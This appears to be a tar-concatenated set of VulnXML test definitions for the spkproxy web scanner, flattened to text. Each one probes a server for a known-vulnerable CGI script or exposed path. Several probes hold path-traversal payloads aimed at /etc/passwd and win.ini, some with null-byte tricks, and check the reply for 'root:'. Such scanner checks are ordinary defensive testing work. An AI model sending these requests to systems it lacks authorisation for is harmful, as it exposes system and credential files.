HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1051.xml0100664000076500007650000000715307566204543021741 0ustar davedave (imagemap) "Possible variation: imagemap.exe installed could contain a buffer overflow. CVE-1999-0951. BID-739." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}imagemap HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1052.xml0100664000076500007650000000715607566204543021745 0ustar davedave (imagemap.exe) "The version of imagemap.exe installed could contain a buffer overflow. CVE-1999-0951. BID-739." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}imagemap.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1053.xml0100664000076500007650000000720707566204543021743 0ustar davedave (inc/sendmail.inc) "Basilix allows its configuration files to be downloaded 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}inc/sendmail.inc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ This program is free software 200 This program is free software 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1054.xml0100664000076500007650000000706607566204543021747 0ustar davedave (info2www) "This CGI allows attackers to execute commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}info2www HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1055.xml0100664000076500007650000000707607566204543021751 0ustar davedave (infosrch.cgi) "This CGI allows attackers to execute commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}infosrch.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1056.xml0100664000076500007650000000703007566204543021740 0ustar davedave (jj) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}jj HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1057.xml0100664000076500007650000000720007566204543021740 0ustar davedave (journal.cgi?folder=journal.cgi%00) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}journal.cgi?folder=journal.cgi%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1058.xml0100664000076500007650000000702507566204543021746 0ustar davedave (ksh) "Shell found in CGI dir!" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ksh HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1059.xml0100664000076500007650000000716107566204543021750 0ustar davedave (lastlines.cgi?process) "This CGI lets attackers read arbitrary files and/or execte commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}lastlines.cgi?process HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1060.xml0100664000076500007650000000710607566204543021737 0ustar davedave (listrec.pl) "This CGI allows attackers to execute commands on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}listrec.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1061.xml0100664000076500007650000000732207566204543021740 0ustar davedave (loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd) "This CGI allows attackers to read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1062.xml0100664000076500007650000000734407566204543021745 0ustar davedave (loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini) "This CGI allows attackers to read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [windows] 200 [windows] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1063.xml0100664000076500007650000000706007566204543021741 0ustar davedave (log-reader.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}log-reader.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1064.xml0100664000076500007650000000703407566204543021743 0ustar davedave (log/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}log/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1065.xml0100664000076500007650000000710707566204543021745 0ustar davedave (log/nether-log.pl?checkit) "Default Pass: nethernet-rules" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}log/nether-log.pl?checkit HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1066.xml0100664000076500007650000000704607566204543021750 0ustar davedave (login.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}login.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1067.xml0100664000076500007650000000704407566204543021747 0ustar davedave (login.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}login.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1068.xml0100664000076500007650000000704607566204543021752 0ustar davedave (logit.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}logit.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1069.xml0100664000076500007650000000703307566204543021747 0ustar davedave (logs.pl) "May be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}logs.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1070.xml0100664000076500007650000000703607566204543021742 0ustar davedave (logs/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}logs/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1071.xml0100664000076500007650000000705407566204543021743 0ustar davedave (logs/access_log) "Just found this log..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}logs/access_log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1072.xml0100664000076500007650000000705207566204543021742 0ustar davedave (lookwho.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}lookwho.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1073.xml0100664000076500007650000000704307566204543021743 0ustar davedave (LWGate) "Check Phrack 55 for info by RFP" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}LWGate HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1074.xml0100664000076500007650000000704307566204543021744 0ustar davedave (lwgate) "Check Phrack 55 for info by RFP" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}lwgate HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1075.xml0100664000076500007650000000705107566204543021744 0ustar davedave (LWGate.cgi) "Check Phrack 55 for info by RFP 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}LWGate.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1076.xml0100664000076500007650000000705107566204543021745 0ustar davedave (lwgate.cgi) "Check Phrack 55 for info by RFP 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}lwgate.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1077.xml0100664000076500007650000000735307566204543021753 0ustar davedave (mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00) "EmuMail allows any file to be retrieved from the remote system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1078.xml0100664000076500007650000000712107566204543021745 0ustar davedave (mailit.pl) "Sambar may allow anonymous email to be sent from any host via this CGI." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}mailit.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1079.xml0100664000076500007650000000705407566204543021753 0ustar davedave (maillist.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}maillist.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1080.xml0100664000076500007650000000705207566204543021741 0ustar davedave (maillist.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}maillist.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1081.xml0100664000076500007650000000714307566204543021743 0ustar davedave (mailnews.cgi) "some versions allow attacker to execute commands as http daemon. Upgrade or remove." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}mailnews.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1082.xml0100664000076500007650000000741107566204543021742 0ustar davedave (main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd) "This CGI allows attackers to read arbitrary files remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1083.xml0100664000076500007650000000712607566204543021746 0ustar davedave (majordomo.pl) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}majordomo.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1084.xml0100664000076500007650000000704007566204543021742 0ustar davedave (man.sh) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}man.sh HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1085.xml0100664000076500007650000000704207566204543021745 0ustar davedave (meta.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}meta.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1086.xml0100664000076500007650000000716407566204543021753 0ustar davedave (mgrqcgi) "This CGI from Magic Enterprise 8.30-5 and earlier are vulnerable to multiple buffer overflows. Upgrade to 9.x." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}mgrqcgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1087.xml0100664000076500007650000000705207566204543021750 0ustar davedave (minimal.exe) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}minimal.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1088.xml0100664000076500007650000000705507566204543021754 0ustar davedave 